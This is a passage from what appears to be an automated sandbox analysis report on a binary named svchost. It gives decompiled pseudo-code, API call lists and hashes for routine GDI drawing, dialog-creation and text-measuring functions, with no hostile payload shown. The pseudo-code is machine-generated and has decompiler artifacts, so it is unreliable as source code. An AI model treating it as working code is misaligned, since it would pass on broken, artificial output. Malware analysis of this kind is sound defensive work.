      • Part of subcall function 00489B44: MulDiv.KERNEL32(?,00000000,00000000), ref: 00489BA2
      • Part of subcall function 004896D5: SetMapMode.GDI32(?,?), ref: 004896EE
      • Part of subcall function 004896D5: SetMapMode.GDI32(?,?), ref: 004896FC
      • Part of subcall function 0048964A: SetROP2.GDI32(?,?), ref: 00489663
      • Part of subcall function 0048964A: SetROP2.GDI32(?,?), ref: 00489671
      • Part of subcall function 004895EE: SetBkMode.GDI32(?,?), ref: 00489607
      • Part of subcall function 004895EE: SetBkMode.GDI32(?,?), ref: 00489615
      • Part of subcall function 00489F2B: __EH_prolog.LIBCMT ref: 00489F30
      • Part of subcall function 00489F2B: CreatePen.GDI32(?,?,?), ref: 00489F53
      • Part of subcall function 00489512: SelectObject.GDI32(?,00000000), ref: 00489534
      • Part of subcall function 00489512: SelectObject.GDI32(?,?), ref: 0048954A
    • GetCapture.USER32 ref: 00432761
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00432780
    • DispatchMessageA.USER32(?), ref: 004327C1
    • DispatchMessageA.USER32(?), ref: 004327DD
    • ScreenToClient.USER32(?,?), ref: 00432824
    • GetCapture.USER32 ref: 0043284C
    • ReleaseCapture.USER32 ref: 00432874
    • ReleaseCapture.USER32 ref: 004328D0
    • DPtoLP.GDI32 ref: 00432914
    • InvalidateRect.USER32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,?,?), ref: 0043299D
    • InvalidateRect.USER32(?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00432A2B
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Capture$Mode$Message$DispatchH_prologInvalidateObjectRectReleaseSelectWindow$ClientCreateScreenViewport
    • String ID:
    • API String ID: 453157188-0
    • Opcode ID: c647619642beb075de6a929e1d159935a21ceeab0a0d16b741b37f98fc397a8f
    • Instruction ID: f98e449be5a0ca3160c5b44798e99e4a65ea8e0eafc53551b843bf2c5a087847
    • Opcode Fuzzy Hash: c647619642beb075de6a929e1d159935a21ceeab0a0d16b741b37f98fc397a8f
    • Instruction Fuzzy Hash: 29B1A671204700ABD724EB65CD85E6FB7E9BF88704F104A1EF25683291DB78ED05CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00424F50 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 405COMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E00424F50(long __ecx, void* __fp0) {
				void* _t190;
				int _t191;
				signed int _t192;
				int _t195;
				int _t199;
				signed int _t206;
				struct HRGN__* _t226;
				int _t227;
				struct tagRECT _t228;
				long _t229;
				struct tagPOINT _t230;
				struct tagRECT _t239;
				signed int _t240;
				struct tagPOINT _t241;
				intOrPtr* _t262;
				intOrPtr* _t264;
				struct tagRECT* _t265;
				struct tagRECT _t271;
				signed int _t272;
				intOrPtr _t274;
				int* _t280;
				struct tagRECT* _t281;
				signed int _t288;
				intOrPtr* _t319;
				intOrPtr* _t320;
				struct tagRECT _t324;
				void* _t358;
				signed int _t359;
				void* _t360;
				struct tagRECT* _t361;
				int _t368;
				signed int _t370;
				intOrPtr _t371;
				int _t374;
				signed int _t375;
				void* _t380;
				intOrPtr _t381;
				signed int _t383;
				struct tagRECT* _t385;
				signed int _t386;
				intOrPtr* _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t401;

				_t401 = __fp0;
				_push(0xffffffff);
				_push(E0048EF84);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t388;
				_t389 = _t388 - 0x88;
				_t383 =  *(_t389 + 0xb8);
				 *(_t389 + 0x30) = __ecx;
				if(_t383 < 2) {
					L19:
					_t190 = 0;
					L20:
					 *[fs:0x0] =  *((intOrPtr*)(_t389 + 0x98));
					return _t190;
				}
				_t280 =  *(_t389 + 0xb8);
				if( *_t280 <= 0) {
					goto L19;
				}
				_t191 = _t280[1];
				if(_t191 <= 0) {
					goto L19;
				}
				_t374 =  *_t280;
				_t368 = _t191;
				if( *((intOrPtr*)(_t389 + 0xb0)) != 1) {
					_t281 =  *(_t389 + 0xac);
					_t385 = _t281;
					_t324 =  *_t385;
					 *(_t389 + 0x20) = _t324;
					_t271 = _t385->top;
					 *(_t389 + 0x24) = _t271;
					_t192 = _t385->right;
					 *(_t389 + 0x28) = _t192;
					_t386 = _t385->bottom;
					asm("cdq");
					 *(_t389 + 0x2c) = _t386;
					_t195 = _t192 - _t324 - _t324 >> 1;
					if(_t374 > _t195) {
						_t374 = _t195;
					}
					asm("cdq");
					_t199 = _t386 - _t271 - _t324 >> 1;
					if(_t368 > _t199) {
						_t368 = _t199;
					}
					 *(_t389 + 0x34) = _t281->left;
					 *(_t389 + 0x38) = _t281->top;
					 *(_t389 + 0x3c) = _t281->right;
					 *(_t389 + 0x40) = _t281->bottom;
					InflateRect(_t389 + 0x38,  ~_t374,  ~_t368);
					_t383 =  *(_t389 + 0xc0);
				} else {
					_t265 =  *(_t389 + 0xac);
					_t361 = _t265;
					 *(_t389 + 0x38) =  *_t361;
					 *(_t389 + 0x3c) = _t361->top;
					 *(_t389 + 0x40) = _t361->right;
					 *(_t389 + 0x44) = _t361->bottom;
					 *(_t389 + 0x24) =  *_t265;
					 *(_t389 + 0x28) = _t265->top;
					 *(_t389 + 0x2c) = _t265->right;
					 *(_t389 + 0x30) = _t265->bottom;
					InflateRect(_t389 + 0x24, _t374, _t368);
				}
				if(_t374 <= 0 || _t368 <= 0) {
					goto L19;
				} else {
					_t272 =  *(_t389 + 0xc4);
					asm("sbb edx, edx");
					_t206 = ( ~((0x10624dd3 * _t272 >> 0x00000020 >> 0x00000006) + (0x10624dd3 * _t272 >> 0x00000020 >> 0x00000006 >> 0x0000001f) & 0x00000001) & 0xfffffffc) + 2;
					 *(_t389 + 0x94) = _t206;
					if((_t272 & 0x00000001) == 0) {
						 *(_t389 + 0x14) = 0xffffffff;
						_t206 =  ~_t206;
					} else {
						 *(_t389 + 0x14) = 1;
					}
					 *(_t389 + 0x54) = _t206;
					 *(_t389 + 0x10) = _t383;
					_t370 = (0x51eb851f * _t272 >> 0x00000020 >> 0x00000005) + (0x51eb851f * _t272 >> 0x00000020 >> 0x00000005 >> 0x0000001f) & 0x00000001;
					if(_t370 != 0) {
						 *(_t389 + 0x10) = _t383 + _t383 - 1;
					}
					E0040B5D0(_t389 + 0x58);
					 *(_t389 + 0xa0) = 0;
					_t375 =  *(_t389 + 0x10) * 4;
					_t387 = E0040B5F0(_t389 + 0x58, _t375);
					if(_t387 != 0) {
						_t288 =  *(_t389 + 0xc0);
						if(((0x66666667 * _t272 >> 0x00000020 >> 0x00000002) + (0x66666667 * _t272 >> 0x00000020 >> 0x00000002 >> 0x0000001f) & 0x00000001) == 0) {
							E0040BF70(_t387,  *((intOrPtr*)(_t389 + 0xbc)), _t288 * 4);
							_t389 = _t389 + 0xc;
							L27:
							if(_t370 == 0) {
								L31:
								_t273 =  *((intOrPtr*)(_t389 + 0xc8));
								_t376 =  *((intOrPtr*)(_t389 + 0xb4));
								_t371 =  *((intOrPtr*)(_t389 + 0xa8));
								 *(_t389 + 0x48) =  *(_t389 + 0x24);
								 *(_t389 + 0x54) =  *(_t389 + 0x28);
								 *(_t389 + 0x54) =  *(_t389 + 0x20);
								 *(_t389 + 0x6c) =  *(_t389 + 0x48);
								if(E00424D20( *(_t389 + 0x48), _t401, _t371, _t389 + 0x54,  *((intOrPtr*)(_t389 + 0xb4)), 1, _t387,  *(_t389 + 0x10),  *((intOrPtr*)(_t389 + 0xc8))) == 0) {
									goto L18;
								}
								 *(_t389 + 0x48) =  *(_t389 + 0x40);
								 *(_t389 + 0x58) =  *(_t389 + 0x2c);
								if(E00424D20( *(_t389 + 0x38), _t401, _t371, _t389 + 0x54, _t376,  *(_t389 + 0x14), _t387,  *(_t389 + 0x10), _t273) == 0) {
									goto L18;
								}
								_t226 = CreateRectRgn(0, 0, 0, 0);
								 *(_t389 + 0x1c) = _t226;
								_t227 = GetClipRgn( *(_t371 + 4), _t226);
								_t228 =  *(_t389 + 0x20);
								 *(_t389 + 0x8c) = _t228;
								 *(_t389 + 0x74) = _t228;
								 *(_t389 + 0x6c) = _t228;
								_t229 =  *(_t389 + 0x34);
								 *(_t389 + 0x84) = _t229;
								 *(_t389 + 0x7c) = _t229;
								_t230 =  *(_t389 + 0x24);
								 *(_t389 + 0x90) = _t230;
								 *(_t389 + 0x70) = _t230;
								 *(_t389 + 0x78) =  *(_t389 + 0x2c);
								asm("sbb esi, esi");
								 *(_t389 + 0x80) =  *(_t389 + 0x40);
								_t380 = 1 +  ~(_t227 - 1);
								 *(_t389 + 0x88) =  *(_t389 + 0x38);
								 *(_t389 + 0x1c) = 0;
								 *((intOrPtr*)(_t389 + 0x18)) = 0x4969e4;
								 *(_t389 + 0xac) = 1;
								E00489EBE(_t389 + 0x1c, CreatePolygonRgn(_t389 + 0x70, 5, 2));
								_t129 = _t389 + 0x18; // 0x4969e4
								E00489AFC(_t371, _t129, 1);
								 *(_t389 + 0x44) =  *(_t389 + 0x20);
								 *(_t389 + 0x4c) =  *(_t389 + 0x34);
								 *(_t389 + 0x48) =  *(_t389 + 0x24);
								 *(_t389 + 0x54) =  *(_t389 + 0x2c);
								if(E00424D20( *(_t389 + 0x44), _t401, _t371, _t389 + 0x54,  *(_t389 + 0xb8),  *(_t389 + 0x94), _t387,  *(_t389 + 0x10), _t273) != 0) {
									_t239 =  *(_t389 + 0x3c);
									 *(_t389 + 0x8c) = _t239;
									 *(_t389 + 0x74) = _t239;
									 *(_t389 + 0x6c) = _t239;
									_t240 =  *(_t389 + 0x28);
									 *(_t389 + 0x84) = _t240;
									 *(_t389 + 0x7c) = _t240;
									_t241 =  *(_t389 + 0x38);
									 *(_t389 + 0x80) =  *(_t389 + 0x2c);
									 *(_t389 + 0x90) = _t241;
									 *(_t389 + 0x70) = _t241;
									 *(_t389 + 0x88) =  *(_t389 + 0x24);
									 *(_t389 + 0x78) =  *(_t389 + 0x40);
									if(_t380 != 1) {
										E0048993F(_t371, 0);
									} else {
										SelectClipRgn( *(_t371 + 4),  *(_t389 + 0x14));
									}
									_t164 = _t389 + 0x18; // 0x4969e4
									E00489F15(_t164);
									E00489EBE(_t389 + 0x1c, CreatePolygonRgn(_t389 + 0x70, 5, 2));
									_t167 = _t389 + 0x18; // 0x4969e4
									E00489AFC(_t371, _t167, 1);
									 *(_t389 + 0x44) =  *(_t389 + 0x3c);
									 *(_t389 + 0x50) =  *(_t389 + 0x28);
									if(E00424D20( *(_t389 + 0x40), _t401, _t371, _t389 + 0x54,  *(_t389 + 0xb8),  *(_t389 + 0x54), _t387,  *(_t389 + 0x10), _t273) != 0) {
										if(_t380 != 1) {
											E0048993F(_t371, 0);
										} else {
											SelectClipRgn( *(_t371 + 4),  *(_t389 + 0x14));
										}
										DeleteObject( *(_t389 + 0x14));
										 *((intOrPtr*)(_t389 + 0x18)) = 0x4969d8;
										 *(_t389 + 0xa0) = 4;
										E00489F15(_t389 + 0x18);
										 *(_t389 + 0xa0) = 0xffffffff;
										 *(_t389 + 0x58) = 0x4969cc;
										E0040B7D0(_t389 + 0x58);
										_t190 = 1;
										goto L20;
									} else {
										 *((intOrPtr*)(_t389 + 0x18)) = 0x4969d8;
										 *(_t389 + 0xa0) = 3;
										E00489F15(_t389 + 0x18);
										goto L18;
									}
								}
								 *((intOrPtr*)(_t389 + 0x18)) = 0x4969d8;
								 *(_t389 + 0xa0) = 2;
								E00489F15(_t389 + 0x18);
								goto L18;
							}
							_t358 =  *(_t389 + 0xc0) - 1;
							if(_t358 <= 0) {
								goto L31;
							}
							_t262 = _t387;
							_t319 = _t375 + _t387 - 4;
							do {
								_t381 =  *_t262;
								_t262 = _t262 + 4;
								 *_t319 = _t381;
								_t319 = _t319 - 4;
								_t358 = _t358 - 1;
							} while (_t358 != 0);
							goto L31;
						}
						_t359 = _t288 - 1;
						if(_t359 < 0) {
							goto L27;
						}
						_t320 = _t387;
						_t264 =  *((intOrPtr*)(_t389 + 0xbc)) + _t359 * 4;
						_t360 = 1 + _t359;
						do {
							_t274 =  *_t264;
							_t264 = _t264 - 4;
							 *_t320 = _t274;
							_t320 = _t320 + 4;
							_t360 = _t360 - 1;
						} while (_t360 != 0);
						goto L27;
					} else {
						L18:
						 *(_t389 + 0xa0) = 0xffffffff;
						 *(_t389 + 0x58) = 0x4969cc;
						E0040B7D0(_t389 + 0x58);
						goto L19;
					}
				}
			}















































    0x00424f50
    0x00424f50
    0x00424f52
    0x00424f5d
    0x00424f5e
    0x00424f65
    0x00424f6d
    0x00424f79
    0x00424f7d
    0x00425140
    0x00425140
    0x00425142
    0x0042514d
    0x0042515a
    0x0042515a
    0x00424f83
    0x00424f8d
    0x00000000
    0x00000000
    0x00424f93
    0x00424f98
    0x00000000
    0x00000000
    0x00424f9e
    0x00424fa0
    0x00424faa
    0x00424ffe
    0x00425005
    0x00425007
    0x0042500a
    0x0042500e
    0x00425011
    0x00425015
    0x00425018
    0x0042501e
    0x00425021
    0x00425024
    0x00425028
    0x0042502c
    0x0042502e
    0x0042502e
    0x00425034
    0x00425037
    0x0042503b
    0x0042503d
    0x0042503d
    0x00425044
    0x0042504b
    0x00425052
    0x0042505a
    0x00425069
    0x0042506f
    0x00424fac
    0x00424fac
    0x00424fb5
    0x00424fbe
    0x00424fc5
    0x00424fcc
    0x00424fd3
    0x00424fd9
    0x00424fe0
    0x00424fea
    0x00424fee
    0x00424ff6
    0x00424ff6
    0x00425078
    0x00000000
    0x00425086
    0x00425086
    0x004250a3
    0x004250ab
    0x004250b0
    0x004250b7
    0x004250c3
    0x004250cb
    0x004250b9
    0x004250b9
    0x004250b9
    0x004250cd
    0x004250dd
    0x004250e8
    0x004250eb
    0x004250f1
    0x004250f1
    0x004250f9
    0x00425106
    0x00425111
    0x0042511e
    0x00425122
    0x00425162
    0x00425178
    0x004251ae
    0x004251b3
    0x004251b6
    0x004251b8
    0x004251db
    0x004251df
    0x004251ee
    0x004251f5
    0x004251fc
    0x00425206
    0x00425211
    0x00425220
    0x0042522b
    0x00000000
    0x00000000
    0x0042523d
    0x0042524b
    0x0042525f
    0x00000000
    0x00000000
    0x0042526d
    0x00425278
    0x0042527c
    0x00425284
    0x00425290
    0x00425297
    0x0042529b
    0x0042529f
    0x004252a4
    0x004252ab
    0x004252af
    0x004252b5
    0x004252bc
    0x004252c4
    0x004252c8
    0x004252ca
    0x004252d1
    0x004252d2
    0x004252d9
    0x004252e1
    0x004252f2
    0x00425305
    0x0042530a
    0x00425313
    0x00425324
    0x0042532c
    0x00425334
    0x00425340
    0x00425360
    0x00425380
    0x0042538c
    0x00425393
    0x00425397
    0x0042539b
    0x004253a2
    0x004253a9
    0x004253ad
    0x004253b1
    0x004253b8
    0x004253bf
    0x004253c7
    0x004253ce
    0x004253d2
    0x004253e9
    0x004253d4
    0x004253dd
    0x004253dd
    0x004253ee
    0x004253f2
    0x0042540b
    0x00425410
    0x00425419
    0x0042542a
    0x00425433
    0x00425453
    0x00425476
    0x0042548d
    0x00425478
    0x00425481
    0x00425481
    0x00425497
    0x0042549d
    0x004254a9
    0x004254b1
    0x004254ba
    0x004254c5
    0x004254cd
    0x004254d2
    0x00000000
    0x00425455
    0x00425455
    0x00425461
    0x00425469
    0x00000000
    0x00425469
    0x00425453
    0x00425362
    0x0042536e
    0x00425376
    0x00000000
    0x00425376
    0x004251c1
    0x004251c6
    0x00000000
    0x00000000
    0x004251c8
    0x004251ca
    0x004251ce
    0x004251ce
    0x004251d0
    0x004251d3
    0x004251d5
    0x004251d8
    0x004251d8
    0x00000000
    0x004251ce
    0x0042517a
    0x0042517f
    0x00000000
    0x00000000
    0x00425188
    0x0042518a
    0x0042518d
    0x0042518e
    0x0042518e
    0x00425190
    0x00425193
    0x00425195
    0x00425198
    0x00425198
    0x00000000
    0x00425124
    0x00425124
    0x00425128
    0x00425133
    0x0042513b
    0x00000000
    0x0042513b
    0x00425122

    APIs
    • InflateRect.USER32(?,?,?), ref: 00424FF6
      • Part of subcall function 00424D20: SetRect.USER32(?,00000000,00000032,00000032,?), ref: 00424E09
      • Part of subcall function 00424D20: OffsetRect.USER32(?,?,?), ref: 00424E16
      • Part of subcall function 00424D20: IntersectRect.USER32(?,?,?), ref: 00424E32
      • Part of subcall function 00424D20: IsRectEmpty.USER32(?), ref: 00424E3D
    • InflateRect.USER32(?,?,?), ref: 00425069
    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042526D
    • GetClipRgn.GDI32(?,00000000), ref: 0042527C
    • CreatePolygonRgn.GDI32 ref: 004252FA
    • SelectClipRgn.GDI32(?,?), ref: 004253DD
    • CreatePolygonRgn.GDI32(?,00000005,00000002), ref: 00425400
    • SelectClipRgn.GDI32(?,?), ref: 00425481
    • DeleteObject.GDI32(?), ref: 00425497
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$ClipCreate$InflatePolygonSelect$DeleteEmptyIntersectObjectOffset
    • String ID: gfff$iI
    • API String ID: 1105800552-70996681
    • Opcode ID: bc7214ae48fee00aaff2e750a3885f8acc3ffc95615ef746991603891c79b5e6
    • Instruction ID: d13fe73bda9595855ae00289b830f5c414df7332b47b2c1c3a5bcb940fbf237d
    • Opcode Fuzzy Hash: bc7214ae48fee00aaff2e750a3885f8acc3ffc95615ef746991603891c79b5e6
    • Instruction Fuzzy Hash: 4DF106B06087419FD324DF19D980B6BBBE5BBC8304F548A2EF98987391DB74A805CB56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00484092 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 172COMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E00484092(intOrPtr* __ecx) {
				signed int _t79;
				intOrPtr _t80;
				DLGTEMPLATE* _t88;
				intOrPtr _t90;
				struct HWND__* _t91;
				intOrPtr* _t142;
				intOrPtr* _t145;
				void* _t147;
				void* _t149;

				_t118 = __ecx;
				E00473304(E00490C74, _t147);
				_t145 = __ecx;
				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x34;
				 *((intOrPtr*)(_t147 - 0x24)) = __ecx;
				if( *(_t147 + 0x10) == 0) {
					 *(_t147 + 0x10) =  *(E0048C6BF() + 8);
				}
				_t142 =  *((intOrPtr*)(E0048C6BF() + 0x1038));
				 *((intOrPtr*)(_t147 - 0x28)) = _t142;
				 *(_t147 - 0x14) = 0;
				 *(_t147 - 0x18) = 0;
				 *(_t147 - 4) = 0;
				E004870D1(_t118, 0x10);
				E004870D1(_t118, 0x3c000);
				if(_t142 == 0) {
					L6:
					if( *(_t147 + 8) == 0) {
						L4:
						_t79 = 0;
						L31:
						 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
						return _t79;
					}
					_t80 =  *0x4b8924; // 0x4b8938
					 *((intOrPtr*)(_t147 - 0x1c)) = _t80;
					 *(_t147 - 4) = 1;
					 *((intOrPtr*)(_t147 - 0x20)) = 0;
					if((0 | E00488F9B( *(_t147 + 8), _t147 - 0x1c, _t147 - 0x20) == 0x00000000) != 0) {
						L14:
						E00488DEA(_t147 - 0x40,  *(_t147 + 8));
						 *(_t147 - 4) = 2;
						E00489124(_t147 - 0x40,  *((intOrPtr*)(_t147 - 0x20)));
						 *(_t147 - 0x14) = E00488E87(_t147 - 0x40);
						 *(_t147 - 4) = 1;
						_t88 = E00488E79(_t147 - 0x40);
						if( *(_t147 - 0x14) != 0) {
							GlobalFix( *(_t147 - 0x14));
							 *(_t147 + 8) = _t88;
						}
						L16:
						 *(_t145 + 0x2c) =  *(_t145 + 0x2c) | 0xffffffff;
						 *(_t145 + 0x24) =  *(_t145 + 0x24) | 0x00000010;
						_push(_t145);
						E00485152();
						_t90 =  *((intOrPtr*)(_t147 + 0xc));
						if(_t90 != 0) {
							_t91 =  *(_t90 + 0x1c);
						} else {
							_t91 = 0;
						}
						 *(_t147 - 0x18) = CreateDialogIndirectParamA( *(_t147 + 0x10),  *(_t147 + 8), _t91, E00483EDA, 0);
						 *(_t147 - 4) = 0;
						E004832C2(_t147 - 0x1c);
						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
						if(_t142 != 0) {
							 *((intOrPtr*)( *_t142 + 0x14))(_t147 - 0x34);
							if( *(_t147 - 0x18) != 0) {
								 *((intOrPtr*)( *_t145 + 0xb4))(0);
							}
						}
						if(E0048519E() == 0) {
							 *((intOrPtr*)( *_t145 + 0xa4))();
						}
						if( *(_t147 - 0x18) != 0 && ( *(_t145 + 0x24) & 0x00000010) == 0) {
							DestroyWindow( *(_t147 - 0x18));
							 *(_t147 - 0x18) = 0;
						}
						if( *(_t147 - 0x14) != 0) {
							GlobalUnWire( *(_t147 - 0x14));
							GlobalFree( *(_t147 - 0x14));
						}
						_t79 = 0 |  *(_t147 - 0x18) != 0x00000000;
						goto L31;
					}
					if(GetSystemMetrics(0x2a) == 0 || E00470AE4( *((intOrPtr*)(_t147 - 0x1c)), "MS Shell Dlg") != 0 && E00470AE4( *((intOrPtr*)(_t147 - 0x1c)), "MS Sans Serif") != 0 && E00470AE4( *((intOrPtr*)(_t147 - 0x1c)), ?str?) != 0) {
						goto L16;
					} else {
						if( *((short*)(_t147 - 0x20)) == 8) {
							 *((intOrPtr*)(_t147 - 0x20)) = 0;
						}
						goto L14;
					}
				}
				_push(_t147 - 0x34);
				if( *((intOrPtr*)( *_t145 + 0xb4))() != 0) {
					 *(_t147 + 8) =  *((intOrPtr*)( *_t142 + 0x10))(_t147 - 0x34,  *(_t147 + 8));
					goto L6;
				}
				goto L4;
			}












    0x00484092
    0x00484097
    0x004840a7
    0x004840a9
    0x004840ac
    0x004840af
    0x004840b9
    0x004840b9
    0x004840c1
    0x004840c9
    0x004840cc
    0x004840cf
    0x004840d2
    0x004840d5
    0x004840df
    0x004840e6
    0x00484112
    0x00484115
    0x004840fa
    0x004840fa
    0x004842a3
    0x004842a8
    0x004842b1
    0x004842b1
    0x00484117
    0x0048411c
    0x00484122
    0x0048412b
    0x00484144
    0x00484199
    0x0048419f
    0x004841aa
    0x004841ae
    0x004841be
    0x004841c1
    0x004841c5
    0x004841cd
    0x004841d2
    0x004841d8
    0x004841d8
    0x004841db
    0x004841db
    0x004841df
    0x004841e3
    0x004841e4
    0x004841e9
    0x004841ee
    0x004841f4
    0x004841f0
    0x004841f0
    0x004841f0
    0x0048420d
    0x00484210
    0x00484213
    0x00484237
    0x0048423d
    0x00484247
    0x0048424d
    0x00484254
    0x00484254
    0x0048424d
    0x00484261
    0x00484267
    0x00484267
    0x00484270
    0x0048427b
    0x00484281
    0x00484281
    0x00484287
    0x0048428c
    0x00484295
    0x00484295
    0x004842a0
    0x00000000
    0x004842a0
    0x00484150
    0x00000000
    0x0048418f
    0x00484194
    0x00484196
    0x00484196
    0x00000000
    0x00484194
    0x00484150
    0x004840ed
    0x004840f8
    0x0048410f
    0x00000000
    0x0048410f
    0x00000000

    APIs
    • __EH_prolog.LIBCMT ref: 00484097
    • GetSystemMetrics.USER32(0000002A), ref: 00484148
    • GlobalFix.KERNEL32(?), ref: 004841D2
    • CreateDialogIndirectParamA.USER32(?,?,?,Function_00083EDA,00000000), ref: 00484204
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CreateDialogGlobalH_prologIndirectMetricsParamSystem
    • String ID: Helv$MS Sans Serif$MS Shell Dlg
    • API String ID: 2252606490-2894235370
    • Opcode ID: 4a3884fbe658c80b991715bc1d2f4904b2f7739a31cc7e52ff83bc9b5d2950e7
    • Instruction ID: e6811b8878838c089d0cc764a83fd97f4fd015be76d61012e6114809db5b0040
    • Opcode Fuzzy Hash: 4a3884fbe658c80b991715bc1d2f4904b2f7739a31cc7e52ff83bc9b5d2950e7
    • Instruction Fuzzy Hash: 4B617B31A0020AEFCF14FFA4C9899AEBBB1BF54304F10497FF505A2291DB388A41CB59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00448240 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E00448240(void* __ecx) {
				void* __ebp;
				CHAR* _t100;
				signed int _t103;
				int _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				int _t138;
				struct tagSIZE _t148;
				intOrPtr _t149;
				struct tagSIZE _t154;
				intOrPtr _t155;
				int _t156;
				struct tagRECT* _t159;
				CHAR* _t166;
				void* _t169;
				signed int _t171;
				intOrPtr _t178;
				long _t191;
				void* _t192;
				intOrPtr _t198;
				long _t215;
				intOrPtr _t237;
				signed int _t239;
				struct tagRECT* _t240;
				void* _t244;
				struct tagRECT* _t256;
				struct HDC__* _t257;
				void* _t258;

				_push(0xffffffff);
				_push(E00490678);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t257;
				_t258 = _t257 - 0x34;
				_t244 = __ecx;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x5c)) - 8)) != 0) {
					L2:
					_push(_t244);
					E00489C16(_t258 + 0x34, _t261);
					_t6 = _t244 + 0x90; // 0x90
					 *(_t258 + 0x50) = 0;
					 *((intOrPtr*)(_t258 + 0x10)) = E00489512(_t258 + 0x30, _t6);
					_t100 =  *(_t244 + 0x5c);
					_t154 = 0;
					_t237 = 0;
					if( *(_t100 - 8) != 0) {
						GetTextExtentPoint32A( *(_t258 + 0x44), _t100,  *(_t100 - 8), _t258 + 0x18);
						_t154 =  *(_t258 + 0x18);
						_t237 =  *((intOrPtr*)(_t258 + 0x1c));
					}
					_t166 =  *(_t244 + 0x58);
					if( *(_t166 - 8) != 0) {
						GetTextExtentPoint32A( *(_t258 + 0x44), _t166,  *(_t166 - 8), _t258 + 0x18);
						_t148 =  *(_t258 + 0x18);
						if(_t148 > _t154) {
							_t154 = _t148;
						}
